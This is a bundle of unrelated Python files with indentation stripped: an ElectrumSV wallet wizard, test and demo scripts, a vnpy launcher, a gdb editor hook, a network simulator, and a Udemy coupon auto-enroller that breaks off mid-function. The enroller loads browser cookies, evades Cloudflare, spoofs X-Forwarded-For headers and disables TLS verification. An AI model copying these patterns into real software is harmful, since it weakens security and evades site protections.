self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
app_state.app.processEvents()
app_state.app.processEvents()
def remove_from_recently_open(self, filename):
app_state.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
app_state.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("ElectrumSV communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let ElectrumSV "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_(MSG_BUTTON_CANCEL))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
app_state.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(network, app_state.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock "
"funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test_visual_regression.py | from http import server
import pathlib
import threading
import percy
from selenium import webdriver
from selenium.webdriver.firefox import options as firefox_options
BASE_DIR = pathlib.Path(__file__).parent.parent.resolve()
DOCS_BUILD_DIR = BASE_DIR / "docs/_build/html/"
class DocsHTTPRequestHandler(server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=str(DOCS_BUILD_DIR), **kwargs)
def main():
if not DOCS_BUILD_DIR.exists():
print(
"No docs build directory found. "
"Did you forget to build the development docs?"
)
exit(1)
handler_class = DocsHTTPRequestHandler
server_address = ('127.0.0.1', 8000)
httpd = server.HTTPServer(server_address, handler_class)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.start()
print("Server thread running. Starting client requests...")
options = firefox_options.Options()
options.headless = True
driver = webdriver.Firefox(options=options)
def take_snapshot(url, title):
print(f"Taking snapshot of {title} at: {url}")
driver.get(url)
driver.implicitly_wait(2)
percy.percy_snapshot(driver, title)
pages = [
("http://localhost:8000", "Homepage"),
("http://localhost:8000/examples/admonitions.html", "Admonitions"),
("http://localhost:8000/examples/autodoc.html", "Autodoc"),
("http://localhost:8000/examples/code-blocks.html", "Code blocks"),
("http://localhost:8000/examples/headings.html", "Headings"),
("http://localhost:8000/examples/images.html", "Images"),
("http://localhost:8000/examples/links.html", "Links"),
("http://localhost:8000/examples/lists.html", "Lists"),
("http://localhost:8000/examples/paragraphs.html", "Paragraphs"),
("http://localhost:8000/examples/rst-page.html", "Restructured Text"),
]
for page in pages:
take_snapshot(page[0], page[1])
driver.quit()
print("Client done.")
httpd.shutdown()
print("Server done.")
if __name__ == "__main__":
main()
|
work.py | import threading
import time
class MyWork:
def __init__(self, maxvalue, setprogress, setresult):
'''maxvalue is given by the GUI
setprogress/ setresult is a function. calling these functions will add an event to the main loop, and update the value.
'''
self.maxvalue = maxvalue
self.setprogress = setprogress
self.setresult = setresult
self.interrupt = False
self.workstarted = False
def start(self):
'''start working. if the application has started, then do nothing.'''
if self.workstarted:
pass
else:
self.workthread = threading.Thread(target=self.dowork)
self.workthread.start()
self.workstarted = True
def stop(self):
'''interrupt work: if work starting and interrupt is true, then the this thread should be closed once the main thread has been closed.'''
if self.workstarted:
self.interrupt = True
self.workthread.join()
def dowork(self):
'''caculate the data and return the result.'''
print('work starts...')
result = 0
for i in range(self.maxvalue + 1):
result += i
self.setprogress(int(100 * i / self.maxvalue + 0.5))
time.sleep(0.1)
if self.interrupt:
print('work interrupted...')
return
self.setresult(result)
print('work ends...')
|
run.py | # flake8: noqa
import os
import sys
import multiprocessing
from time import sleep
from datetime import datetime, time
from logging import INFO
# 将repostory的目录i,作为根目录,添加到系统环境中。
ROOT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
sys.path.append(ROOT_PATH)
print(f'append {ROOT_PATH} into sys.path')
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.index_tick_publisher import IndexTickPublisherApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
rebbit_setting = {
"host": "192.168.1.211"
}
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
publisher_engine = main_engine.add_app(IndexTickPublisherApp)
main_engine.write_log("主引擎创建成功")
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
sleep(10)
main_engine.write_log("启动连接tdx & rabbit")
publisher_engine.connect(rebbit_setting)
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(15, 30)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
# Start child process in trading period
if trading and child_process is None:
print("启动子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("子进程启动成功")
# 非记录时间则退出子进程
if not trading and child_process is not None:
print("关闭子进程")
child_process.terminate()
child_process.join()
child_process = None
print("子进程关闭成功")
sleep(5)
if __name__ == "__main__":
run_parent()
|
follow-editor.py | import gdb
from threading import Thread
from traceback import print_exc
from datetime import datetime
from os.path import isfile
import subprocess
class FollowEditor(gdb.Command):
@staticmethod
def printf(msg):
print("follow-editor: %s" % (msg,))
def __init__(self):
self.editor_command = "emacsclient -n +%L %F"
self.next_prompt_hook = gdb.prompt_hook
self.directories = {}
self.current_loc = (None, None)
self.enabled = False
gdb.prompt_hook = self.prompt_hook
super(FollowEditor, self).__init__("follow-editor", gdb.COMMAND_OBSCURE)
def run_editor_command(self, filename, line):
new_loc = (filename, line)
if self.current_loc == new_loc:
return
self.current_loc = new_loc
command = self.editor_command.replace("%L", str(line)).replace("%F", filename).replace("%%", "%")
#FollowEditor.printf("Trying to run %s" % command)
proc = subprocess.Popen(command, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def wait_for_editor():
proc.communicate()
proc.wait()
Thread(target=wait_for_editor).start()
def prompt_hook(self, gdb_instance):
try:
if self.enabled:
frame = gdb.selected_frame()
if frame:
sal = frame.find_sal()
if sal.symtab and sal.line:
filename = sal.symtab.fullname()
if filename and isfile(filename):
self.run_editor_command(filename, sal.line)
else:
FollowEditor.printf("No such file: %s" % filename)
except Exception as e:
string_err = str(e)
if string_err != "No frame is currently selected.":
print_exc(e)
finally:
if self.next_prompt_hook:
return self.next_prompt_hook()
def invoke(self, arg, from_tty):
argv = gdb.string_to_argv(arg)
command = None
if len(argv) > 0:
command = argv[0]
if command == "command":
try:
self.editor_command = argv[1]
except:
print("usage: follow-editor command <command>")
elif command == "on":
self.enabled = True
elif command == "off":
self.enabled = False
# elif command == "add-path-translation":
# if len(argv) == 3:
# dir_from = argv[1]
# dir_to = argv[2]
# self.directories[dir_from] = dir_to
# else:
# print("usage: follow-editor add-path-translation <from-path> <to-path>")
# elif command == "del-path-translation":
# if len(argv) == 2:
# dir_from = argv[1]
# if dir_from in self.directories:
# del self.directories[dir_from]
# else:
# FollowEditor.printf("Unknown directory: %s" % dir_from)
# else:
# print("usage: follow-editor del-path-translation <from-directory>")
elif command == "info" or command is None:
print("follow-editor configuration:")
print(" Editor command: %s" % (self.editor_command))
print(" Run editor command: %s" % ("on" if self.enabled else "off"))
# if len(self.directories):
# print(" Directory translations:")
# for k,v in self.directories:
# print(" %s -> %s" % (k,v))
else:
# print("Usage: follow-editor (command <command> | add-path-translation <from> <to> | del-path-translation <from> | info)")
print("Usage: follow-editor (command <command> | on | off | info)")
#print(dir(gdb))
FollowEditor()
|
Network.py | import argparse
import socket
import threading
from time import sleep
import random
import RDT
## Provides an abstraction for the network layer
class NetworkLayer:
# configuration parameters
prob_pkt_loss = 0
prob_byte_corr = 0.2
prob_pkt_reorder = 0
# class variables
sock = None
conn = None
buffer_S = ''
lock = threading.Lock()
collect_thread = None
stop = None
socket_timeout = 0.1
reorder_msg_S = None
def __init__(self, role_S, server_S, port):
if role_S == 'client':
print('Network: role is client')
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((server_S, port))
self.conn.settimeout(self.socket_timeout)
elif role_S == 'server':
print('Network: role is server')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('localhost', port))
self.sock.listen(1)
self.conn, addr = self.sock.accept()
self.conn.settimeout(self.socket_timeout)
# start the thread to receive data on the connection
self.collect_thread = threading.Thread(name='Collector', target=self.collect)
self.stop = False
self.collect_thread.start()
def disconnect(self):
if self.collect_thread:
self.stop = True
self.collect_thread.join()
def __del__(self):
if self.sock is not None: self.sock.close()
if self.conn is not None: self.conn.close()
def udt_send(self, msg_S):
# return without sending if the packet is being dropped
if random.random() < self.prob_pkt_loss:
return
# corrupt a packet
if random.random() < self.prob_byte_corr:
start = random.randint(RDT.Packet.length_S_length,
len(msg_S) - RDT.Packet.length_S_length) # make sure we are not corrupting the length field,
# since that makes life really difficult
num = random.randint(1, 5)
repl_S = ''.join(random.sample('XXXXX', num)) # sample length >= num
msg_S = msg_S[:start] + repl_S + msg_S[min(start + num, len(msg_S)-1):]
# reorder packets - either hold a packet back, or if one held back then send both
if random.random() < self.prob_pkt_reorder or self.reorder_msg_S:
if self.reorder_msg_S is None:
self.reorder_msg_S = msg_S
return None
else:
msg_S += self.reorder_msg_S
self.reorder_msg_S = None
# keep calling send until all the bytes are transferred
totalsent = 0
while totalsent < len(msg_S):
sent = self.conn.send(msg_S[totalsent:].encode('utf-8'))
if sent == 0:
raise RuntimeError("socket connection broken")
totalsent = totalsent + sent
## Receive data from the network and save in internal buffer
def collect(self):
# print (threading.currentThread().getName() + ': Starting')
while (True):
try:
recv_bytes = self.conn.recv(2048)
with self.lock:
self.buffer_S += recv_bytes.decode('utf-8')
# you may need to uncomment the BlockingIOError handling on Windows machines
# except BlockingIOError as err:
# pass
except socket.timeout as err:
pass
if self.stop:
# print (threading.currentThread().getName() + ': Ending')
return
## Deliver collected data to client
def udt_receive(self):
with self.lock:
ret_S = self.buffer_S
self.buffer_S = ''
return ret_S
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Network layer implementation.')
parser.add_argument('role', help='Role is either client or server.', choices=['client', 'server'])
parser.add_argument('server', help='Server.')
parser.add_argument('port', help='Port.', type=int)
args = parser.parse_args()
network = NetworkLayer(args.role, args.server, args.port)
if args.role == 'client':
network.udt_send('MSG_FROM_CLIENT')
sleep(2)
print(network.udt_receive())
network.disconnect()
else:
sleep(1)
print(network.udt_receive())
network.udt_send('MSG_FROM_SERVER')
network.disconnect()
|
duce.py | import json
import os
import random
import re
import sys
import threading
import time
import traceback
from decimal import Decimal
from urllib.parse import parse_qs, unquote, urlsplit
from webbrowser import open as web
import browser_cookie3
import cloudscraper
import PySimpleGUI as sg
import requests
from bs4 import BeautifulSoup as bs
from pack.base64 import *
# DUCE
sg.set_global_icon(icon)
sg.change_look_and_feel("dark")
sg.theme_background_color
sg.set_options(
button_color=(sg.theme_background_color(), sg.theme_background_color()),
border_width=0,
font=10,
)
############## Scraper
def discudemy():
global du_links
du_links = []
big_all = []
head = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}
for page in range(1, 4):
r = requests.get("https://www.discudemy.com/all/" + str(page), headers=head)
soup = bs(r.content, "html5lib")
small_all = soup.find_all("a", {"class": "card-header"})
big_all.extend(small_all)
main_window["pDiscudemy"].update(page)
main_window["pDiscudemy"].update(0, max=len(big_all))
for index, item in enumerate(big_all):
main_window["pDiscudemy"].update(index + 1)
title = item.string
url = item["href"].split("/")[4]
r = requests.get("https://www.discudemy.com/go/" + url, headers=head)
soup = bs(r.content, "html5lib")
du_links.append(title + "|:|" + soup.find("a", id="couponLink").string)
main_window["pDiscudemy"].update(0, visible=False)
main_window["iDiscudemy"].update(visible=True)
def udemy_freebies():
global uf_links
uf_links = []
big_all = []
for page in range(1, 3):
r = requests.get(
"https://www.udemyfreebies.com/free-udemy-courses/" + str(page)
)
soup = bs(r.content, "html5lib")
small_all = soup.find_all("a", {"class": "theme-img"})
big_all.extend(small_all)
main_window["pUdemy Freebies"].update(page)
main_window["pUdemy Freebies"].update(0, max=len(big_all))
for index, item in enumerate(big_all):
main_window["pUdemy Freebies"].update(index + 1)
title = item.img["alt"]
link = requests.get(
"https://www.udemyfreebies.com/out/" + item["href"].split("/")[4]
).url
uf_links.append(title + "|:|" + link)
main_window["pUdemy Freebies"].update(0, visible=False)
main_window["iUdemy Freebies"].update(visible=True)
def tutorialbar():
global tb_links
tb_links = []
big_all = []
for page in range(1, 4):
r = requests.get("https://www.tutorialbar.com/all-courses/page/" + str(page))
soup = bs(r.content, "html5lib")
small_all = soup.find_all(
"h3", class_="mb15 mt0 font110 mobfont100 fontnormal lineheight20"
)
big_all.extend(small_all)
main_window["pTutorial Bar"].update(page)
main_window["pTutorial Bar"].update(0, max=len(big_all))
for index, item in enumerate(big_all):
main_window["pTutorial Bar"].update(index + 1)
title = item.a.string
url = item.a["href"]
r = requests.get(url)
soup = bs(r.content, "html5lib")
link = soup.find("a", class_="btn_offer_block re_track_btn")["href"]
if "www.udemy.com" in link:
tb_links.append(title + "|:|" + link)
main_window["pTutorial Bar"].update(0, visible=False)
main_window["iTutorial Bar"].update(visible=True)
def real_discount():
global rd_links
rd_links = []
big_all = []
for page in range(1, 3):
r = requests.get("https://real.discount/stores/Udemy?page=" + str(page))
soup = bs(r.content, "html5lib")
small_all = soup.find_all("div", class_="col-xl-4 col-md-6")
big_all.extend(small_all)
main_window["pReal Discount"].update(page)
main_window["pReal Discount"].update(0, max=len(big_all))
for index, item in enumerate(big_all):
main_window["pReal Discount"].update(index + 1)
title = item.a.h3.string
url = "https://real.discount" + item.a["href"]
r = requests.get(url)
soup = bs(r.content, "html5lib")
link = soup.find("div", class_="col-xs-12 col-md-12 col-sm-12 text-center").a[
"href"
]
if link.startswith("http://click.linksynergy.com"):
link = parse_qs(link)["RD_PARM1"][0]
rd_links.append(title + "|:|" + link)
main_window["pReal Discount"].update(0, visible=False)
main_window["iReal Discount"].update(visible=True)
def coursevania():
global cv_links
cv_links = []
r = requests.get("https://coursevania.com/courses/")
soup = bs(r.content, "html5lib")
nonce = json.loads(
[
script.string
for script in soup.find_all("script")
if script.string and "load_content" in script.string
][0].strip("_mlv = norsecat;\n")
)["load_content"]
r = requests.get(
"https://coursevania.com/wp-admin/admin-ajax.php?&template=courses/grid&args={%22posts_per_page%22:%2230%22}&action=stm_lms_load_content&nonce="
+ nonce
+ "&sort=date_high"
).json()
soup = bs(r["content"], "html5lib")
small_all = soup.find_all("div", {"class": "stm_lms_courses__single--title"})
main_window["pCourse Vania"].update(0, max=len(small_all))
for index, item in enumerate(small_all):
main_window["pCourse Vania"].update(index + 1)
title = item.h5.string
r = requests.get(item.a["href"])
soup = bs(r.content, "html5lib")
cv_links.append(
title + "|:|" + soup.find("div", {"class": "stm-lms-buy-buttons"}).a["href"]
)
main_window["pCourse Vania"].update(0, visible=False)
main_window["iCourse Vania"].update(visible=True)
def idcoupons():
global idc_links
idc_links = []
big_all = []
for page in range(1, 6):
r = requests.get(
"https://idownloadcoupon.com/product-category/udemy-2/page/" + str(page)
)
soup = bs(r.content, "html5lib")
small_all = soup.find_all("a", attrs={"class": "button product_type_external"})
big_all.extend(small_all)
main_window["pIDownloadCoupons"].update(0, max=len(big_all))
for index, item in enumerate(big_all):
main_window["pIDownloadCoupons"].update(index + 1)
title = item["aria-label"]
link = unquote(item["href"])
if link.startswith("https://ad.admitad.com"):
link = parse_qs(link)["ulp"][0]
elif link.startswith("https://click.linksynergy.com"):
link = parse_qs(link)["murl"][0]
idc_links.append(title + "|:|" + link)
main_window["pIDownloadCoupons"].update(0, visible=False)
main_window["iIDownloadCoupons"].update(visible=True)
def enext() -> list:
en_links = []
r = requests.get("https://e-next.in/e/udemycoupons.php")
soup = bs(r.content, "html5lib")
big_all = soup.find("div", {"class": "scroll-box"}).find_all("p", {"class": "p2"})
main_window["pE-next"].update(0, max=len(big_all))
for i in big_all:
main_window["pE-next"].update(index + 1)
title = i.text[11:].strip().removesuffix("Enroll Now free").strip()
link = i.a["href"]
en_links.append(title + "|:|" + link)
main_window["pE-next"].update(0, visible=False)
main_window["iE-next"].update(visible=True)
########################### Constants
version = "v1.6"
def create_scrape_obj():
funcs = {
"Discudemy": threading.Thread(target=discudemy, daemon=True),
"Udemy Freebies": threading.Thread(target=udemy_freebies, daemon=True),
"Tutorial Bar": threading.Thread(target=tutorialbar, daemon=True),
"Real Discount": threading.Thread(target=real_discount, daemon=True),
"Course Vania": threading.Thread(target=coursevania, daemon=True),
"IDownloadCoupons": threading.Thread(target=idcoupons, daemon=True),
"E-next": threading.Thread(target=enext, daemon=True),
}
return funcs
################
def cookiejar(
client_id,
access_token,
csrf_token,
):
cookies = dict(
client_id=client_id,
access_token=access_token,
csrf_token=csrf_token,
)
return cookies
def load_settings():
try:
os.rename("duce-settings.json", "duce-gui-settings.json")
except:
pass
try:
with open("duce-gui-settings.json") as f:
settings = json.load(f)
except FileNotFoundError:
settings = dict(
requests.get(
"https://raw.githubusercontent.com/techtanic/Discounted-Udemy-Course-Enroller/master/duce-gui-settings.json"
).json()
)
title_exclude = "\n".join(settings["title_exclude"])
instructor_exclude = "\n".join(settings["instructor_exclude"])
settings.setdefault("save_txt", True) # v1.3
settings["sites"].setdefault("E-next", True) # v1.4
settings.setdefault("discounted_only", False) # v1.4
return settings, instructor_exclude, title_exclude
def save_settings():
with open("duce-gui-settings.json", "w") as f:
json.dump(settings, f, indent=4)
def fetch_cookies():
cookies = browser_cookie3.load(domain_name="www.udemy.com")
return requests.utils.dict_from_cookiejar(cookies), cookies
def get_course_id(url):
r = requests.get(url, allow_redirects=False)
if r.status_code in (404, 302, 301):
return False
if "/course/draft/" in url:
return False
soup = bs(r.content, "html5lib")
try:
courseid = soup.find(
"div",
attrs={"data-content-group": "Landing Page"},
)["data-course-id"]
except:
courseid = soup.find(
"body", attrs={"data-module-id": "course-landing-page/udlite"}
)["data-clp-course-id"]
# with open("problem.txt","w",encoding="utf-8") as f:
# f.write(str(soup))
return courseid
def get_course_coupon(url):
query = urlsplit(url).query
params = parse_qs(query)
try:
params = {k: v[0] for k, v in params.items()}
return params["couponCode"]
except:
return ""
def affiliate_api(courseid):
r = s.get(
"https://www.udemy.com/api-2.0/courses/"
+ courseid
+ "/?fields[course]=locale,primary_category,avg_rating_recent,visible_instructors",
).json()
instructor = (
r["visible_instructors"][0]["url"].removeprefix("/user/").removesuffix("/")
)
return (
r["primary_category"]["title"],
r["locale"]["simple_english_title"],
round(r["avg_rating_recent"], 1),
instructor,
)
def course_landing_api(courseid):
r = s.get(
"https://www.udemy.com/api-2.0/course-landing-components/"
+ courseid
+ "/me/?components=purchase"
).json()
try:
purchased = r["purchase"]["data"]["purchase_date"]
except:
purchased = False
try:
amount = r["purchase"]["data"]["list_price"]["amount"]
except:
print(r["purchase"]["data"])
return purchased, Decimal(amount)
def remove_duplicates(l):
l = l[::-1]
for i in l:
while l.count(i) > 1:
l.remove(i)
return l[::-1]
def update_courses():
while True:
r = s.get("https://www.udemy.com/api-2.0/users/me/subscribed-courses/").json()
new_menu = [
["Help", ["Support", "Github", "Discord"]],
[f'Total Courses: {r["count"]}'],
]
main_window["mn"].Update(menu_definition=new_menu)
time.sleep(10) # So that Udemy's api doesn't get spammed.
def update_available():
release_version = requests.get(
"https://api.github.com/repos/techtanic/Discounted-Udemy-Course-Enroller/releases/latest"
).json()["tag_name"]
if version.removeprefix("v") < release_version.removeprefix("v"):
return (
f" Update {release_version} Availabe",
f"Update {release_version} Availabe",
)
else:
return f"Login {version}", f"Discounted-Udemy-Course-Enroller {version}"
def manual_login():
for retry in range(0, 2):
s = cloudscraper.CloudScraper()
r = s.get(
"https://www.udemy.com/join/signup-popup/",
)
soup = bs(r.text, "html5lib")
csrf_token = soup.find("input", {"name": "csrfmiddlewaretoken"})["value"]
data = {
"csrfmiddlewaretoken": csrf_token,
"locale": "en_US",
"email": settings["email"],
"password": settings["password"],
}
s.headers.update({"Referer": "https://www.udemy.com/join/signup-popup/"})
try:
r = s.post(
"https://www.udemy.com/join/login-popup/?locale=en_US",
data=data,
allow_redirects=False,
)
except cloudscraper.exceptions.CloudflareChallengeError:
continue
if r.status_code == 302:
return "", r.cookies["client_id"], r.cookies["access_token"], csrf_token
else:
soup = bs(r.content, "html5lib")
with open("test.txt","w") as f:
f.write(r.text)
txt = soup.find(
"div", class_="alert alert-danger js-error-alert"
).text.strip()
if txt[0] == "Y":
return "Too many logins per hour try later", "", "", ""
elif txt[0] == "T":
return "Email or password incorrect", "", "", ""
else:
return txt, "", "", ""
return "Cloudflare is blocking your requests try again after an hour", "", "", ""
def check_login(client_id, access_token, csrf_token):
head = {
"authorization": "Bearer " + access_token,
"accept": "application/json, text/plain, */*",
"x-requested-with": "XMLHttpRequest",
"x-forwarded-for": str(
".".join(map(str, (random.randint(0, 255) for _ in range(4))))
),
"x-udemy-authorization": "Bearer " + access_token,
"content-type": "application/json;charset=UTF-8",
"origin": "https://www.udemy.com",
"referer": "https://www.udemy.com/",
"dnt": "1",
}
r = requests.get(
"https://www.udemy.com/api-2.0/contexts/me/?me=True&Config=True", headers=head
).json()
currency = r["Config"]["price_country"]["currency"]
user = r["me"]["display_name"]
s = requests.session()
cookies = cookiejar(client_id, access_token, csrf_token)
s.cookies.update(cookies)
s.headers.update(head)
s.keep_alive = False
return head, user, currency, s
def title_in_exclusion(title, t_x):
title_words = title.casefold().split()
for word in title_words:
word = word.casefold()
if word in t_x:
return True
return False
# -----------------
def free_checkout(coupon, courseid):
payload = (
'{"checkout_environment":"Marketplace","checkout_event":"Submit","shopping_info":{"items":[{"discountInfo":{"code":"'
+ coupon
+ '"},"buyable":{"type":"course","id":'
+ str(courseid)
+ ',"context":{}},"price":{"amount":0,"currency":"'
+ currency
+ '"}}]},"payment_info":{"payment_vendor":"Free","payment_method":"free-method"}}'
)
r = s.post(
"https://www.udemy.com/payment/checkout-submit/",
data=payload,
verify=False,
)
return r.json()
def free_enroll(courseid):
s.get(
"https://www.udemy.com/course/subscribe/?courseId=" + str(courseid),
verify=False,
)
r = s.get(
"https://www.udemy.com/api-2.0/users/me/subscribed-courses/"
+ str(courseid)
+ "/?fields%5Bcourse%5D=%40default%2Cbuyable_object_type%2Cprimary_subcategory%2Cis_private",
verify=False,
)
return r.json()
# -----------------
def auto(list_st):
main_window["pout"].update(0, max=len(list_st))
se_c, ae_c, e_c, ex_c, as_c = 0, 0, 0, 0, 0
if settings["save_txt"]:
if not os.path.exists("Courses/"):
os.makedirs("Courses/")
txt_file = open(f"Courses/" + time.strftime("%Y-%m-%d--%H-%M"), "w")
for index, combo in enumerate(list_st):
tl = combo.split("|:|")
main_window["out"].print(str(index) + " " + tl[0], text_color="yellow", end=" ")
link = tl[1]
main_window["out"].print(link, text_color="blue")
try:
course_id = get_course_id(link)
if course_id:
coupon_id = get_course_coupon(link)
cat, lang, avg_rating, instructor = affiliate_api(course_id)
purchased, amount = course_landing_api(course_id)
if (
instructor in instructor_exclude
or title_in_exclusion(tl[0], title_exclude)
or cat not in categories
or lang not in languages
or avg_rating < min_rating
):
if instructor in instructor_exclude:
main_window["out"].print(
f"Instructor excluded: {instructor}", text_color="light blue"
)
elif title_in_exclusion(tl[0], title_exclude):
main_window["out"].print("Title Excluded", text_color="light blue")
elif cat not in categories:
main_window["out"].print(
f"Category excluded: {cat}", text_color="light blue"
)
elif lang not in languages:
main_window["out"].print(
f"Languages excluded: {lang}", text_color="light blue"
)
elif avg_rating < min_rating:
main_window["out"].print(
f"Poor rating: {avg_rating}", text_color="light blue"
)
main_window["out"].print()
ex_c += 1
else:
if not purchased:
if coupon_id:
slp = ""
